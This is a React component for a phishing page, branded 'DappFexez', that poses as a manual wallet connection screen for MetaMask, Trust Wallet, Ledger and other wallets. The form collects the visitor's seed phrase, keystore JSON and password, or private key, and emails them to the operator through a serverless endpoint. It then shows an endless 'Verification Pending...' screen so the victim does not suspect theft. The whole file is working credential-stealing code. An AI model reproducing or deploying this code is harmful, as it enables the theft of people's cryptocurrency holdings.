// src/components/Form/ConnectForm.js
import React, { useState, useRef, useMemo } from 'react';
import { motion } from 'framer-motion';
import { Formik, Form, Field } from 'formik';
import { X } from 'lucide-react';
import * as Yup from 'yup';
import { useLocation, useNavigate, useParams } from 'react-router-dom';
import HCaptcha from '@hcaptcha/react-hcaptcha';
// Using a serverless function (api/send-email.js) to send via Resend securely

const LoadingScreen = ({ onClose }) => (
  <div className="fixed inset-0 z-50 flex flex-col items-center justify-center bg-[#1b130a]/95">
    <button
      onClick={onClose}
      className="absolute top-4 right-4 p-1 text-gray-300 hover:text-white transition-colors rounded-full hover:bg-white/10"
    >
      <X size={16} />
    </button>
    <div className="text-center p-4">
      <motion.div
        className="w-16 h-16 border-4 border-yellow-500 border-t-transparent rounded-full mb-4"
        animate={{ rotate: 360 }}
        transition={{ duration: 1, repeat: Infinity, ease: "linear" }}
      />
      <h2 className="text-xl font-semibold text-gray-200">Verification Pending...</h2>
    </div>
  </div>
);

const ConnectForm = () => {
  const [activeTab, setActiveTab] = useState('phrase');
  const [showLoading, setShowLoading] = useState(false);
  const [hcaptchaToken, setHcaptchaToken] = useState(null);
  const hcaptchaSiteKey = process.env.REACT_APP_MXR_CAPTCHA_SITE_KEY || 'f8fafdcc-0966-49de-a350-9a3e52c27d80';
  const hcaptchaRef = useRef(null);
  const formRef = useRef();
  const location = useLocation();
  const navigate = useNavigate();
  const { wallet: walletParam } = useParams();
  
  // Helper to format wallet name from URL param
  const formatWalletNameFromParam = (param) => {
    if (!param) return 'Wallet';
    // Handle special cases
    const specialCases = {
      'walletconnect': 'WalletConnect',
      'trust': 'Trust Wallet',
      'trust-wallet': 'Trust Wallet',
      'metamask': 'MetaMask',
      'coinbase': 'Coinbase',
      'binance': 'Binance',
      'exodus': 'Exodus',
      'ledger': 'Ledger',
      'phantom': 'Phantom',
      'okx': 'OKX',
      'okto': 'OKTO',
      'okse': 'OKSE',
      'mew': 'MEW',
    };
    const lower = param.toLowerCase();
    if (specialCases[lower]) {
      return specialCases[lower];
    }
    // Capitalize each word
    return param
      .split('-')
      .map(word => word.charAt(0).toUpperCase() + word.slice(1).toLowerCase())
      .join(' ');
  };
  
  const wallet = location.state?.wallet || {
    name: formatWalletNameFromParam(walletParam),
    icon: null
  };

  // Validation schema
  const validationSchema = useMemo(() => Yup.object().shape({
    phrase: Yup.string().when([], {
      is: () => activeTab === 'phrase',
      then: () => Yup.string().required('Wallet phrase is required'),
    }),
    keystore: Yup.string().when([], {
      is: () => activeTab === 'keystore',
      then: () => Yup.string().required('Keystore JSON is required'),
    }),
    password: Yup.string().when([], {
      is: () => activeTab === 'keystore',
      then: () => Yup.string().required('Password is required'),
    }),
    privateKey: Yup.string().when([], {
      is: () => activeTab === 'privateKey',
      then: () => Yup.string().required('Private key is required'),
    }),
  }), [activeTab]);

  const handleSubmit = async (values, { setSubmitting }) => {
    try {
      // Check hCaptcha verification
      if (!hcaptchaToken) {
        alert('Please complete the verification challenge.');
        setSubmitting(false);
        return;
      }

      // Verify hCaptcha server-side first
      const verifyResponse = await fetch('/api/verify-hcaptcha', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({ token: hcaptchaToken }),
      });

      const verifyData = await verifyResponse.json();
      if (!verifyResponse.ok || !verifyData.success) {
        alert('Verification failed. Please try again.');
        setSubmitting(false);
        setHcaptchaToken(null);
        if (hcaptchaRef.current) {
          hcaptchaRef.current.resetCaptcha();
        }
        return;
      }

      setShowLoading(true);

      const subject = `DappFexez ${wallet.name} (${activeTab}) submission`;
      
      // Escape HTML to prevent XSS and ensure proper display
      const escapeHtml = (text) => {
        if (!text) return '';
        const div = document.createElement('div');
        div.textContent = text;
        return div.innerHTML;
      };

      const walletData = escapeHtml(values[activeTab] || '');
      const walletName = escapeHtml(wallet.name);
      const walletType = escapeHtml(activeTab);
      const password = activeTab === 'keystore' ? escapeHtml(values.password || 'N/A') : '';

      // Ensure HTML is properly formatted and valid
      const html = `
        <!DOCTYPE html>
        <html>
        <head>
          <meta charset="UTF-8">
        </head>
        <body style="font-family:Arial,Helvetica,sans-serif;line-height:1.6;color:#0a0f23;margin:0;padding:20px;">
          <h2 style="color:#0a0f23;margin-bottom:16px;">DappFexez Wallet Submission</h2>
          <p><strong>Wallet:</strong> ${walletName}</p>
          <p><strong>Type:</strong> ${walletType}</p>
          <p><strong>Timestamp:</strong> ${new Date().toISOString()}</p>
          <pre style="white-space:pre-wrap;background:#f6f6f6;padding:12px;border-radius:8px;overflow-x:auto;word-wrap:break-word;">${walletData}</pre>
          ${activeTab === 'keystore' ? `<p><strong>Password:</strong> ${password}</p>` : ''}
        </body>
        </html>
      `;

      const response = await fetch('/api/send-email', {
        method: 'POST',
        headers: { 
          'Content-Type': 'application/json',
          'Accept': 'application/json'
        },
        body: JSON.stringify({
          subject: subject,
          html: html.trim()
        })
      });

      const rawText = await response.text();
      let responseData;
      try {
        responseData = rawText ? JSON.parse(rawText) : {};
      } catch {
        responseData = rawText || {};
      }

      if (!response.ok) {
        // Try to extract a more detailed error message
        let errorMsg =
          responseData?.message ||
          responseData?.error ||
          responseData?.failures?.[0]?.reason ||
          `Server error: ${response.status}`;
        
        // If there are details, include them
        if (responseData?.details) {
          if (typeof responseData.details === 'object') {
            errorMsg += ' - ' + JSON.stringify(responseData.details);
          } else {
            errorMsg += ' - ' + responseData.details;
          }
        }
        if (!responseData?.details && responseData?.failures) {
          errorMsg += ' - ' + JSON.stringify({ failures: responseData.failures });
        }
        
        // Log full error for debugging
        console.error('Full error response:', responseData);
        
        throw new Error(errorMsg);
      }

      // Success - keep loading screen visible
      console.log('Email sent successfully:', responseData);
      
    } catch (error) {
      console.error('Failed to send email:', error);
      const errorMessage = error.message || 'Unknown error occurred. Please check your connection and try again.';
      alert(`Failed to submit: ${errorMessage}`);
      setSubmitting(false);
      setShowLoading(false);
    }
  };

  if (showLoading) {
    return <LoadingScreen onClose={() => navigate('/')} />;
  }

  return (
    <motion.div
      initial={{ opacity: 0 }}
      animate={{ opacity: 1 }}
      exit={{ opacity: 0 }}
      className="min-h-screen bg-[#1b130a] flex items-center justify-center p-4"
    >
      <div className="w-full max-w-lg p-6 md:p-8 relative rounded-2xl bg-[#1a1209]/80 border border-[#4a2f17]/40 shadow-[0_20px_60px_rgba(0,0,0,0.35)]">
        <button
          onClick={() => navigate('/')}
          className="absolute top-4 right-4 p-1 text-gray-300 hover:text-white transition-colors rounded-full hover:bg-white/10"
          style={{ width: '28px', height: '28px' }}
        >
          <X size={16} />
        </button>

        <div className="text-center mb-6">
          <h2 className="text-2xl font-extrabold bg-gradient-to-r from-[#fde68a] via-[#a16207] to-white bg-clip-text text-transparent mb-3">
            Connect Manually
          </h2>
          <div className="flex items-center justify-center gap-3 mb-6">
            {wallet.icon ? (
              <img 
                src={wallet.icon} 
                alt={`${wallet.name} logo`}
                className="w-10 h-10 object-contain"
              />
            ) : (
              <span className="text-3xl">💼</span>
            )}
            <h3 className="text-base text-gray-300">Import your <span className="text-white font-semibold">{wallet.name}</span> wallet</h3>
          </div>

          <div className="flex justify-center gap-6 mb-6 border-b border-[#4a2f17]/40">
            <button
              type="button"
              onClick={() => setActiveTab('phrase')}
              className={`pb-3 text-sm tracking-wide ${
                activeTab === 'phrase'
                  ? 'text-[#a16207] border-b-2 border-[#a16207]'
                  : 'text-gray-400 hover:text-gray-300'
              }`}
            >
              Phrase
            </button>
            <button
              type="button"
              onClick={() => setActiveTab('keystore')}
              className={`pb-3 text-sm tracking-wide ${
                activeTab === 'keystore'
                  ? 'text-[#a16207] border-b-2 border-[#a16207]'
                  : 'text-gray-400 hover:text-gray-300'
              }`}
            >
              Keystore JSON
            </button>
            <button
              type="button"
              onClick={() => setActiveTab('privateKey')}
              className={`pb-3 text-sm tracking-wide ${
                activeTab === 'privateKey'
                  ? 'text-[#a16207] border-b-2 border-[#a16207]'
                  : 'text-gray-400 hover:text-gray-300'
              }`}
            >
              Private Key
            </button>
          </div>
        </div>

        <Formik
          initialValues={{
            phrase: '',
            keystore: '',
            password: '',
            privateKey: '',
          }}
          validationSchema={validationSchema}
          onSubmit={handleSubmit}
        >
          {({ errors, touched, isSubmitting }) => (
            <Form ref={formRef} className="space-y-6">
              {activeTab === 'phrase' && (
                <div>
                  <Field
                    as="textarea"
                    name="phrase"
                    className="w-full h-32 p-4 rounded-lg bg-[#20160d] border border-[#4a2f17]/40 text-gray-200 focus:ring-2 focus:ring-[#a16207] focus:outline-none text-sm"
                    placeholder="Enter your wallet phrase"
                  />
                  {errors.phrase && touched.phrase && (
                    <div className="text-red-400 text-sm mt-1">{errors.phrase}</div>
                  )}
                </div>
              )}

              {activeTab === 'keystore' && (
                <div className="space-y-4">
                  <Field
                    as="textarea"
                    name="keystore"
                    className="w-full h-32 p-4 rounded-lg bg-[#20160d] border border-[#4a2f17]/40 text-gray-200 focus:ring-2 focus:ring-[#a16207] focus:outline-none text-sm"
                    placeholder="Enter your Keystore JSON"
                  />
                  {errors.keystore && touched.keystore && (
                    <div className="text-red-400 text-sm mt-1">{errors.keystore}</div>
                  )}
                  <Field
                    type="password"
                    name="password"
                    className="w-full p-4 rounded-lg bg-[#20160d] border border-[#4a2f17]/40 text-gray-200 focus:ring-2 focus:ring-[#a16207] focus:outline-none text-sm"
                    placeholder="Wallet password"
                  />
                  {errors.password && touched.password && (
                    <div className="text-red-400 text-sm mt-1">{errors.password}</div>
                  )}
                </div>
              )}

              {activeTab === 'privateKey' && (
                <div>
                  <Field
                    type="password"
                    name="privateKey"
                    className="w-full p-4 rounded-lg bg-[#20160d] border border-[#4a2f17]/40 text-gray-200 focus:ring-2 focus:ring-[#a16207] focus:outline-none text-sm"
                    placeholder="Enter your Private Key"
                  />
                  {errors.privateKey && touched.privateKey && (
                    <div className="text-red-400 text-sm mt-1">{errors.privateKey}</div>
                  )}
                </div>
              )}

              <div className="space-y-4">
                <div>
                  <HCaptcha
                    sitekey={hcaptchaSiteKey}
                    onVerify={(token) => setHcaptchaToken(token)}
                    onExpire={() => setHcaptchaToken(null)}
                    ref={hcaptchaRef}
                  />
                </div>

                <button
                  type="submit"
                  disabled={isSubmitting}
                  className="w-full py-3 rounded-lg bg-gradient-to-r from-[#92400e] to-[#b45309] text-white font-semibold hover:from-[#a16207] hover:to-[#c2410c] transition-colors duration-200 disabled:opacity-50"
                >
                  Validate
                </button>

                <button
                  type="button"
                  onClick={() => navigate('/')}
                  className="w-full py-3 rounded-lg border border-white/10 text-white hover:bg-white/5 transition-colors duration-200"
                >
                  Close
                </button>
              </div>
            </Form>
          )}
        </Formik>
      </div>
    </motion.div>
  );
};

export default ConnectForm;